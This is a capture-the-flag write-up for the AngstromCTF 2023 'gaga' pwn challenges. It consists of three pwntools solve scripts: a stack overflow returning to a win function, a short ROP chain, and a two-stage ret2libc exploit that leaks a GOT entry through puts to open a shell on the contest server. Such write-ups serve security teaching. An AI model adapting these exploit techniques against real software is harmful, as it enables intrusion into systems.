gaga
05/04/2023
By: unvariant
Tags: pwn, AngstromCTF-2023

Problem Description:
Multipart challenge! Note all use essentially the same Dockerfile. The flags are split among all three challenges. If you are already a pwn expert, the last challenge has the entire flag.
Hints:
None

gaga0 Solve script
from pwn import *
# gaga0: a single stack-buffer overflow that replaces the saved return
# address with the address of `win`. The 0x48 bytes of filler presumably
# span the buffer and saved frame pointer up to the return slot — confirm
# against the binary's stack layout. The fixed 0x401236 address suggests a
# non-PIE build (no ASLR for the main image); PIE or a stack canary would
# both defeat this as written.
HOST, PORT = "challs.actf.co", 31300
WIN = 0x401236

conn = remote(HOST, PORT)
conn.send(b"A" * 0x48)  # filler, written separately from the address
conn.send(p64(WIN))     # 8-byte little-endian return address
conn.interactive()
gaga1 Solve script
from pwn import *
# gaga1: same overflow as gaga0, but the return slot is followed by two
# more words. 0x4013b3 is presumably a pop-register gadget and 0x1337 the
# value it pops before control reaches `win` — verify both against the
# binary; the script itself does not say what the gadget is.
HOST, PORT = "challs.actf.co", 31301
WIN = 0x401236

conn = remote(HOST, PORT)
conn.send(b"A" * 0x48)  # filler up to the saved return address
chain = b"".join(p64(word) for word in (0x4013b3, 0x1337, WIN))
conn.send(chain)
conn.interactive()
gaga2 Solve script
from pwn import *
# gaga2: ret2libc in two stages (leak a libc pointer, then reuse it).
file = ELF("gaga2")

# Local process by default; `python3 solve.py REMOTE` targets the CTF service.
io = remote("challs.actf.co", 31302) if args.REMOTE else process("./gaga2")

# Fixed addresses inside gaga2 (presumably a non-PIE build — confirm).
win = 0x401236  # not used by the rest of this script
rdi = 0x4012b3  # presumably a `pop rdi; ret` gadget — verify against the binary
ret = 0x40101a  # presumably a bare `ret`, used for stack alignment — verify
def dump():
    """Print every GOT entry of gaga2 by leaking it through puts.

    One overflow per entry: after the filler, the chain is
    ``rdi``, the GOT slot address, ``puts@plt``, ``main`` — so the program
    prints the slot's contents and then re-enters ``main`` for the next
    round. The first 6 bytes received are zero-extended to a u64 and
    printed as ``<symbol>: <hex>``.

    Uses the module-level ``io``, ``file`` and ``rdi``. Note: nothing in
    this script calls ``dump``; it is a diagnostic left in by the author.
    """
    for name, got_slot in file.got.items():
        io.recvuntil(b": ")
        io.send(b"A" * 0x48)
        chain = b"".join(
            p64(word)
            for word in (rdi, got_slot, file.plt["puts"], file.symbols["main"])
        )
        print(chain)
        io.sendline(chain)
        # assumes the 6 leaked bytes arrive first, with nothing printed before them
        raw = io.recv(6)
        value = u64(raw.ljust(8, b"\x00"))
        print(f"{name}: {value:x}")
# Stage 1: leak gets@GOT via puts, then return to main for a second overflow.
io.recvuntil(b": ")
io.send(b"A" * 0x48)
attack = b"".join(
    p64(word)
    for word in (rdi, file.got["gets"], file.plt["puts"], file.symbols["main"])
)
print(attack)
io.sendline(attack)
# assumes the 6 leaked bytes arrive first, with nothing printed before them
leak = u64(io.recv(6).ljust(8, b"\x00"))

# 0x83970 (and the two offsets below) are specific to the target's libc
# build; the script does not record which libc version they came from, so
# they must be re-derived for any other environment.
base = leak - 0x83970
print(f"base: {base:x}")

# Stage 2: second overflow using libc-relative addresses.
io.recvuntil(b": ")
io.send(b"A" * 0x48)
attack = b"".join(p64(word) for word in (rdi, base + 0x1b45bd, ret, base + 0x52290))
io.send(attack)  # sent without a trailing newline, unlike the leak chain
io.interactive()